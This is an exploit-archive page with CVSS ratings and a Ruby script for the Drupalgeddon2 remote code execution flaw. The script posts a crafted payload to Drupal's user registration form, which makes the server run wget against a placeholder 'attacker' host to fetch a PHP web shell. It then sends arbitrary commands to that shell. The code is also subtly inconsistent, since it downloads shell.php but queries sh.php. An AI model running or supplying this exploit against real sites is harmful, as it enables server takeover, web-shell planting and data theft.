Drupal Drupalgeddon2 Remote Code Execution (Ruby)

2018.04.13
Credit: Hans Topo
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

require 'net/http' # Hans Topo ruby port from Drupalggedon2 exploit. # Based on Vitalii Rudnykh exploit target = ARGV[0] command = ARGV[1] url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' shell = "<?php system($_GET['cmd']); ?>" payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec' uri = URI(url) http = Net::HTTP.new(uri.host,uri.port) if uri.scheme == 'https' http.use_ssl = true http.verify_mode = OpenSSL::SSL::VERIFY_NONE end req = Net::HTTP::Post.new(uri.path) req.body = payload response = http.request(req) if response.code != "200" puts "[*] Response: " + response.code puts "[*] Target seems not to be exploitable" exit end puts "[*] Target seems to be exploitable." exploit_uri = URI(target+"/sh.php?cmd=#{command}") response = Net::HTTP.get_response(exploit_uri) puts response.body


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top